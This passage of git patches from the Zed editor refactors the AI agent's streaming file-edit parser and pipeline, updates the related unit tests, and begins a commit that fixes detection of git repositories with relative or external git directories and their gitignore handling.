tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + EditEvent::NewTextChunk { + chunk, done: true, .. + } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.current_edit.take() + else { + return Ok(()); + }; + + // Flush any remaining reindent buffer + final chunk. + let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + } + Ok(()) + } } impl EditSession { @@ -704,10 +942,8 @@ impl EditSession { buffer, old_text, diff, - mode, - parser: ToolEditParser::default(), - pipeline: EditPipeline::new(), - file_changed_since_last_read, + parser: StreamingParser::default(), + pipeline: Pipeline::new(mode, file_changed_since_last_read), _finalize_diff_guard: finalize_diff_guard, }) } @@ -719,21 +955,39 @@ impl EditSession { event_stream: &ToolCallEventStream, cx: &mut AsyncApp, ) -> Result<(), String> { - match input.mode { - EditFileMode::Write => { + let Self { + abs_path, + buffer, + diff, + parser, + pipeline, + .. + } = self; + match pipeline { + Pipeline::Write(write) => { let content = input .content .ok_or_else(|| "'content' field is required for write mode".to_string())?; - let events = self.parser.finalize_content(&content); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.finalize_content(&content) { + write.process_event(event, buffer, tool, cx); + } } - EditFileMode::Edit => { + Pipeline::Edit(edit_pipeline) => { let edits = input .edits .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; - let events = self.parser.finalize_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.finalize_edits(&edits) { + edit_pipeline.process_event( + event, + buffer, + diff, + abs_path, + tool, + event_stream, + cx, + )?; + } if log::log_enabled!(log::Level::Debug) { log::debug!("Got edits:"); @@ -773,246 +1027,35 @@ impl EditSession { event_stream: &ToolCallEventStream, cx: &mut AsyncApp, ) -> Result<(), String> { - match &self.mode { - EditFileMode::Write => { + let Self { + abs_path, + buffer, + diff, + parser, + pipeline, + .. + } = self; + match pipeline { + Pipeline::Write(write) => { if let Some(content) = &partial.content { - let events = self.parser.push_content(content); - self.process_events(&events, tool, event_stream, cx)?; + for event in &parser.push_content(content) { + write.process_event(event, buffer, tool, cx); + } } } - EditFileMode::Edit => { + Pipeline::Edit(edit_pipeline) => { if let Some(edits) = partial.edits { - let events = self.parser.push_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - } - } - } - Ok(()) - } - - fn process_events( - &mut self, - events: &[ToolEditEvent], - tool: &EditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - for event in events { - match event { - ToolEditEvent::ContentChunk { chunk } => { - let (buffer_id, buffer_len) = self - .buffer - .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); - let edit_range = if self.pipeline.content_written { - buffer_len..buffer_len - } else { - 0..buffer_len - }; - - agent_edit_buffer( - &self.buffer, - [(edit_range, chunk.as_str())], - &tool.action_log, - cx, - ); - cx.update(|cx| { - tool.set_agent_location( - self.buffer.downgrade(), - text::Anchor::max_for_buffer(buffer_id), - cx, - ); - }); - self.pipeline.content_written = true; - } - - ToolEditEvent::OldTextChunk { - chunk, done: false, .. - } => { - log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - && !chunk.is_empty() - { - if let Some(match_range) = matcher.push(chunk, None) { - let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_outside(match_range.clone()) - }); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(match_range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - - ToolEditEvent::OldTextChunk { - edit_index, - chunk, - done: true, - } => { - log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); - - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - else { - continue; - }; - - if !chunk.is_empty() { - matcher.push(chunk, None); - } - let range = extract_match( - matcher.finish(), - &self.buffer, - edit_index, - self.file_changed_since_last_read, - cx, - )?; - - let anchor_range = self - .buffer - .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ - ToolCallLocation::new(&self.abs_path).line(Some(line)), - ]), - ); - - let buffer_indent = snapshot.line_indent_for_row(line); - let query_indent = text::LineIndent::from_iter( - matcher - .query_lines() - .first() - .map(|s| s.as_str()) - .unwrap_or("") - .chars(), - ); - let indent_delta = compute_indent_delta(buffer_indent, query_indent); - - let old_text_in_buffer = - snapshot.text_for_range(range.clone()).collect::(); - - log::debug!( - "edit[{}] old_text matched at {}..{}: {:?}", - edit_index, - range.start, - range.end, - old_text_in_buffer, - ); - - let text_snapshot = self - .buffer - .read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { - streaming_diff: StreamingDiff::new(old_text_in_buffer), - edit_cursor: range.start, - reindenter: Reindenter::new(indent_delta), - original_snapshot: text_snapshot, - }); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: false, .. - } => { - log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - streaming_diff, - edit_cursor, - reindenter, - original_snapshot, - .. - }) = &mut self.pipeline.current_edit - else { - continue; - }; - - let reindented = reindenter.push(chunk); - if reindented.is_empty() { - continue; - } - - let char_ops = streaming_diff.push_new(&reindented); - apply_char_operations( - &char_ops, - &self.buffer, - original_snapshot, - edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(*edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: true, .. - } => { - log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - mut streaming_diff, - mut edit_cursor, - mut reindenter, - original_snapshot, - }) = self.pipeline.current_edit.take() - else { - continue; - }; - - // Flush any remaining reindent buffer + final chunk. - let mut final_text = reindenter.push(chunk); - final_text.push_str(&reindenter.finish()); - - log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); - - if !final_text.is_empty() { - let char_ops = streaming_diff.push_new(&final_text); - apply_char_operations( - &char_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, + for event in &parser.push_edits(&edits) { + edit_pipeline.process_event( + event, + buffer, + diff, + abs_path, + tool, + event_stream, cx, - ); + )?; } - - let remaining_ops = streaming_diff.finish(); - apply_char_operations( - &remaining_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); } } } diff --git a/crates/agent/src/tools/tool_edit_parser.rs b/crates/agent/src/tools/edit_file_tool/streaming_parser.rs similarity index 86% rename from crates/agent/src/tools/tool_edit_parser.rs rename to crates/agent/src/tools/edit_file_tool/streaming_parser.rs index 86f249ff34eb13..6a44959a141c80 100644 --- a/crates/agent/src/tools/tool_edit_parser.rs +++ b/crates/agent/src/tools/edit_file_tool/streaming_parser.rs @@ -2,9 +2,9 @@ use smallvec::SmallVec; use crate::{Edit, PartialEdit}; -/// Events emitted by `ToolEditParser` as tool call input streams in. +/// Events emitted by `StreamingParser` for edit-mode input. #[derive(Debug, PartialEq, Eq)] -pub enum ToolEditEvent { +pub enum EditEvent { /// A chunk of `old_text` for an edit operation. OldTextChunk { edit_index: usize, @@ -17,6 +17,11 @@ pub enum ToolEditEvent { chunk: String, done: bool, }, +} + +/// Events emitted by `StreamingParser` for write-mode input. +#[derive(Debug, PartialEq, Eq)] +pub enum WriteEvent { /// A chunk of content for write/overwrite mode. ContentChunk { chunk: String }, } @@ -34,9 +39,9 @@ struct EditStreamState { /// /// The tool call streaming infrastructure delivers partial JSON objects where /// string fields grow over time. This parser compares consecutive partials, -/// computes the deltas, and emits `ToolEditEvent`s that downstream pipeline -/// stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for new_text) -/// can consume incrementally. +/// computes the deltas, and emits `EditEvent`s or `WriteEvent`s that downstream +/// pipeline stages (`StreamingFuzzyMatcher` for old_text, `StreamingDiff` for +/// new_text) can consume incrementally. /// /// Because partial JSON comes through a fixer (`partial-json-fixer`) that /// closes incomplete escape sequences, a string can temporarily contain wrong @@ -46,18 +51,18 @@ struct EditStreamState { /// next partial confirms or corrects it. This avoids feeding corrupted bytes /// to downstream consumers. #[derive(Default, Debug)] -pub struct ToolEditParser { +pub struct StreamingParser { edit_states: Vec, content_emitted_len: usize, } -impl ToolEditParser { +impl StreamingParser { /// Push a new set of partial edits (from edit mode) and return any events. /// /// Each call should pass the *entire current* edits array as seen in the /// latest partial input. The parser will diff it against its internal state /// to produce only the new events. - pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[ToolEditEvent; 4]> { + pub fn push_edits(&mut self, edits: &[PartialEdit]) -> SmallVec<[EditEvent; 4]> { let mut events = SmallVec::new(); for (index, partial) in edits.iter().enumerate() { @@ -81,7 +86,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(old_text[start..].to_string()); state.old_text_done = true; state.old_text_emitted_len = old_text.len(); - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: true, @@ -92,7 +97,7 @@ impl ToolEditParser { if safe_end > state.old_text_emitted_len { let chunk = old_text[state.old_text_emitted_len..safe_end].to_string(); state.old_text_emitted_len = safe_end; - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: false, @@ -110,7 +115,7 @@ impl ToolEditParser { if safe_end > state.new_text_emitted_len { let chunk = new_text[state.new_text_emitted_len..safe_end].to_string(); state.new_text_emitted_len = safe_end; - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: index, chunk, done: false, @@ -126,14 +131,14 @@ impl ToolEditParser { /// /// Each call should pass the *entire current* content string. The parser /// will diff it against its internal state to emit only the new chunk. - pub fn push_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + pub fn push_content(&mut self, content: &str) -> SmallVec<[WriteEvent; 1]> { let mut events = SmallVec::new(); let safe_end = safe_emit_end(content); if safe_end > self.content_emitted_len { let chunk = content[self.content_emitted_len..safe_end].to_string(); self.content_emitted_len = safe_end; - events.push(ToolEditEvent::ContentChunk { chunk }); + events.push(WriteEvent::ContentChunk { chunk }); } events @@ -146,7 +151,7 @@ impl ToolEditParser { /// `final_edits` should be the fully deserialized final edits array. The /// parser compares against its tracked state and emits any remaining deltas /// with `done: true`. - pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[ToolEditEvent; 4]> { + pub fn finalize_edits(&mut self, edits: &[Edit]) -> SmallVec<[EditEvent; 4]> { let mut events = SmallVec::new(); for (index, edit) in edits.iter().enumerate() { @@ -165,7 +170,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(edit.old_text[start..].to_string()); state.old_text_done = true; state.old_text_emitted_len = edit.old_text.len(); - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: index, chunk, done: true, @@ -177,7 +182,7 @@ impl ToolEditParser { let chunk = normalize_done_chunk(edit.new_text[start..].to_string()); state.new_text_done = true; state.new_text_emitted_len = edit.new_text.len(); - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: index, chunk, done: true, @@ -189,14 +194,14 @@ impl ToolEditParser { } /// Finalize content with the complete input. - pub fn finalize_content(&mut self, content: &str) -> SmallVec<[ToolEditEvent; 1]> { + pub fn finalize_content(&mut self, content: &str) -> SmallVec<[WriteEvent; 1]> { let mut events = SmallVec::new(); let start = self.content_emitted_len.min(content.len()); if content.len() > start { let chunk = content[start..].to_string(); self.content_emitted_len = content.len(); - events.push(ToolEditEvent::ContentChunk { chunk }); + events.push(WriteEvent::ContentChunk { chunk }); } events @@ -204,7 +209,7 @@ impl ToolEditParser { /// When a new edit appears at `index`, finalize the edit at `index - 1` /// by emitting a `NewTextChunk { done: true }` if it hasn't been finalized. - fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { + fn finalize_previous_edit(&mut self, new_index: usize) -> Option> { if new_index == 0 || self.edit_states.is_empty() { return None; } @@ -220,7 +225,7 @@ impl ToolEditParser { // If old_text was never finalized, finalize it now with an empty done chunk. if !state.old_text_done { state.old_text_done = true; - events.push(ToolEditEvent::OldTextChunk { + events.push(EditEvent::OldTextChunk { edit_index: previous_index, chunk: String::new(), done: true, @@ -230,7 +235,7 @@ impl ToolEditParser { // Emit a done event for new_text if not already finalized. if !state.new_text_done { state.new_text_done = true; - events.push(ToolEditEvent::NewTextChunk { + events.push(EditEvent::NewTextChunk { edit_index: previous_index, chunk: String::new(), done: true, @@ -276,7 +281,7 @@ mod tests { #[test] fn test_single_edit_streamed_incrementally() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // old_text arrives in chunks: "hell" → "hello w" → "hello world" let events = parser.push_edits(&[PartialEdit { @@ -285,7 +290,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "hell".into(), done: false, @@ -298,7 +303,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "o w".into(), done: false, @@ -313,12 +318,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "orld".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "good".into(), done: false, @@ -333,7 +338,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "bye world".into(), done: false, @@ -347,7 +352,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, @@ -357,7 +362,7 @@ mod tests { #[test] fn test_done_chunks_strip_trailing_newline() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[Edit { old_text: "before\n".into(), @@ -366,12 +371,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "before".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "after".into(), done: true, @@ -382,7 +387,7 @@ mod tests { #[test] fn test_partial_edit_chunks_hold_back_trailing_newline() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("before\n".into()), @@ -391,12 +396,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "before".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "after".into(), done: false, @@ -410,7 +415,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, @@ -420,7 +425,7 @@ mod tests { #[test] fn test_multiple_edits_sequential() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // First edit streams in let events = parser.push_edits(&[PartialEdit { @@ -429,7 +434,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "first old".into(), done: false, @@ -443,12 +448,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "first new".into(), done: false, @@ -470,12 +475,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: "second".into(), done: false, @@ -497,12 +502,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: " old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "second new".into(), done: true, @@ -513,12 +518,12 @@ mod tests { #[test] fn test_content_streamed_incrementally() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_content("hello"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "hello".into(), }] ); @@ -526,7 +531,7 @@ mod tests { let events = parser.push_content("hello world"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: " world".into(), }] ); @@ -538,7 +543,7 @@ mod tests { let events = parser.push_content("hello world!"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "!".into() }] + &[WriteEvent::ContentChunk { chunk: "!".into() }] ); // Finalize with no additional content @@ -548,13 +553,13 @@ mod tests { #[test] fn test_finalize_content_with_remaining() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); parser.push_content("partial"); let events = parser.finalize_content("partial content here"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: " content here".into(), }] ); @@ -562,14 +567,14 @@ mod tests { #[test] fn test_content_trailing_backslash_held_back() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Partial JSON fixer turns incomplete \n into \\ (literal backslash). // The trailing backslash is held back. let events = parser.push_content("hello,\\"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "hello,".into(), }] ); @@ -579,14 +584,14 @@ mod tests { let events = parser.push_content("hello,\n"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + &[WriteEvent::ContentChunk { chunk: "\n".into() }] ); // Normal growth. let events = parser.push_content("hello,\nworld"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { + &[WriteEvent::ContentChunk { chunk: "world".into(), }] ); @@ -594,7 +599,7 @@ mod tests { #[test] fn test_content_finalize_with_trailing_backslash() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Stream a partial with a fixer-corrupted trailing backslash. // The backslash is held back. @@ -604,13 +609,13 @@ mod tests { let events = parser.finalize_content("abc\n"); assert_eq!( events.as_slice(), - &[ToolEditEvent::ContentChunk { chunk: "\n".into() }] + &[WriteEvent::ContentChunk { chunk: "\n".into() }] ); } #[test] fn test_no_partials_direct_finalize() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[Edit { old_text: "old".into(), @@ -619,12 +624,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "new".into(), done: true, @@ -635,7 +640,7 @@ mod tests { #[test] fn test_no_partials_direct_finalize_multiple() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.finalize_edits(&[ Edit { @@ -650,22 +655,22 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "first old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "first new".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 1, chunk: "second old".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "second new".into(), done: true, @@ -676,7 +681,7 @@ mod tests { #[test] fn test_old_text_no_growth() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("same".into()), @@ -684,7 +689,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "same".into(), done: false, @@ -701,7 +706,7 @@ mod tests { #[test] fn test_old_text_none_then_appears() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Edit exists but old_text is None (field hasn't arrived yet) let events = parser.push_edits(&[PartialEdit { @@ -717,7 +722,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "text".into(), done: false, @@ -727,7 +732,7 @@ mod tests { #[test] fn test_empty_old_text_with_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // old_text is empty, new_text appears immediately let events = parser.push_edits(&[PartialEdit { @@ -737,12 +742,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "inserted".into(), done: false, @@ -753,7 +758,7 @@ mod tests { #[test] fn test_three_edits_streamed() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Stream first edit parser.push_edits(&[PartialEdit { @@ -793,12 +798,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 1, chunk: "".into(), done: true, }, - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 2, chunk: "c".into(), done: false, @@ -824,12 +829,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 2, chunk: "".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 2, chunk: "C".into(), done: true, @@ -840,7 +845,7 @@ mod tests { #[test] fn test_finalize_with_unseen_old_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Only saw partial old_text, never saw new_text in partials parser.push_edits(&[PartialEdit { @@ -855,12 +860,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: " old text".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "replacement".into(), done: true, @@ -871,7 +876,7 @@ mod tests { #[test] fn test_finalize_with_partially_seen_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); parser.push_edits(&[PartialEdit { old_text: Some("old".into()), @@ -884,7 +889,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: " new text".into(), done: true, @@ -894,7 +899,7 @@ mod tests { #[test] fn test_repeated_pushes_with_no_change() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("stable".into()), @@ -919,7 +924,7 @@ mod tests { #[test] fn test_old_text_trailing_backslash_held_back() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); // Partial-json-fixer produces a literal backslash when the JSON stream // cuts in the middle of an escape sequence like \n. The parser holds @@ -931,7 +936,7 @@ mod tests { // The trailing `\` is held back — only "hello," is emitted. assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "hello,".into(), done: false, @@ -955,7 +960,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "\nworld".into(), done: false, @@ -965,7 +970,7 @@ mod tests { #[test] fn test_multiline_old_and_new_text() { - let mut parser = ToolEditParser::default(); + let mut parser = StreamingParser::default(); let events = parser.push_edits(&[PartialEdit { old_text: Some("line1\nline2".into()), @@ -973,7 +978,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::OldTextChunk { + &[EditEvent::OldTextChunk { edit_index: 0, chunk: "line1\nline2".into(), done: false, @@ -987,12 +992,12 @@ mod tests { assert_eq!( events.as_slice(), &[ - ToolEditEvent::OldTextChunk { + EditEvent::OldTextChunk { edit_index: 0, chunk: "\nline3".into(), done: true, }, - ToolEditEvent::NewTextChunk { + EditEvent::NewTextChunk { edit_index: 0, chunk: "LINE1".into(), done: false, @@ -1006,7 +1011,7 @@ mod tests { }]); assert_eq!( events.as_slice(), - &[ToolEditEvent::NewTextChunk { + &[EditEvent::NewTextChunk { edit_index: 0, chunk: "\nLINE2\nLINE3".into(), done: false, From de8153b82646baf0bf7caebeb13cd95b4f754de9 Mon Sep 17 00:00:00 2001 From: Max Brunsfeld Date: Mon, 4 May 2026 09:20:25 -0700 Subject: [PATCH 166/231] Fix handling of git repositories with an external git directory (#55402) Closes https://github.com/zed-industries/zed/issues/54824 Previously, we always assumed that `gitdir` was an absolute path. Also, we did not correctly handle custom gitignore files that were configured via separate git directories. Release Notes: - Fixed failure to recognize git repositories where `gitdir` was expressed as a relative path. - Fixed handling of gitignores in git repositories that use a separate git dir. --- crates/worktree/src/worktree.rs | 122 ++++--- crates/worktree/tests/integration/main.rs | 414 +++++++++++++++------- 2 files changed, 353 insertions(+), 183 deletions(-) diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index dc1f208fac7067..974219bf9bca4d 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -3964,19 +3964,22 @@ impl BackgroundScanner { let repo = if scanning_enabled { let (ignores, exclude, repo) = discover_ancestor_git_repo(self.fs.clone(), &root_abs_path).await; - self.state - .lock() - .await - .snapshot - .ignores_by_parent_abs_path - .extend(ignores); + let mut state = self.state.lock().await; + state.snapshot.ignores_by_parent_abs_path.extend(ignores); if let Some(exclude) = exclude { - self.state - .lock() - .await + let work_directory_abs_path: Arc = repo + .as_ref() + .map(|(_, work_directory)| { + state + .snapshot + .work_directory_abs_path(work_directory) + .into() + }) + .unwrap_or_else(|| root_abs_path.as_path().into()); + state .snapshot .repo_exclude_by_work_dir_abs_path - .insert(root_abs_path.as_path().into(), (exclude, false)); + .insert(work_directory_abs_path, (exclude, false)); } repo @@ -5078,12 +5081,8 @@ impl BackgroundScanner { state.snapshot.ignores_by_parent_abs_path.extend(ignores); if let Some((ancestor_dot_git, work_directory)) = repo { if let Some(exclude) = exclude { - let work_directory_abs_path = self - .state - .lock() - .await - .snapshot - .work_directory_abs_path(&work_directory); + let work_directory_abs_path = + state.snapshot.work_directory_abs_path(&work_directory); state .snapshot @@ -5201,7 +5200,11 @@ impl BackgroundScanner { if *needs_update { *needs_update = false; - ignores_to_update.push(work_dir_abs_path.clone()); + if work_dir_abs_path.starts_with(abs_path.as_path()) { + ignores_to_update.push(work_dir_abs_path.clone()); + } else { + ignores_to_update.push(abs_path.as_path().into()); + } if let Some((_, repository)) = repository { let exclude_abs_path = repository.common_dir_abs_path.join(REPO_EXCLUDE); @@ -5543,39 +5546,45 @@ async fn discover_ancestor_git_repo( .await .is_ok_and(|metadata| metadata.is_some()) { - if index != 0 { + let dot_git_abs_path = if index != 0 { // We canonicalize, since the FS events use the canonicalized path. - if let Some(ancestor_dot_git) = fs.canonicalize(&ancestor_dot_git).await.log_err() { - let location_in_repo = root_abs_path - .as_path() - .strip_prefix(ancestor) - .unwrap() - .into(); - log::info!("inserting parent git repo for this worktree: {location_in_repo:?}"); - // We associate the external git repo with our root folder and - // also mark where in the git repo the root folder is located. - return ( - ignores, - exclude, - Some(( - ancestor_dot_git, - WorkDirectory::AboveProject { - absolute_path: ancestor.into(), - location_in_repo, - }, - )), - ); - }; - } + match fs.canonicalize(&ancestor_dot_git).await.log_err() { + Some(path) => path, + None => continue, + } + } else { + ancestor_dot_git.clone() + }; + let dot_git_abs_path: Arc = 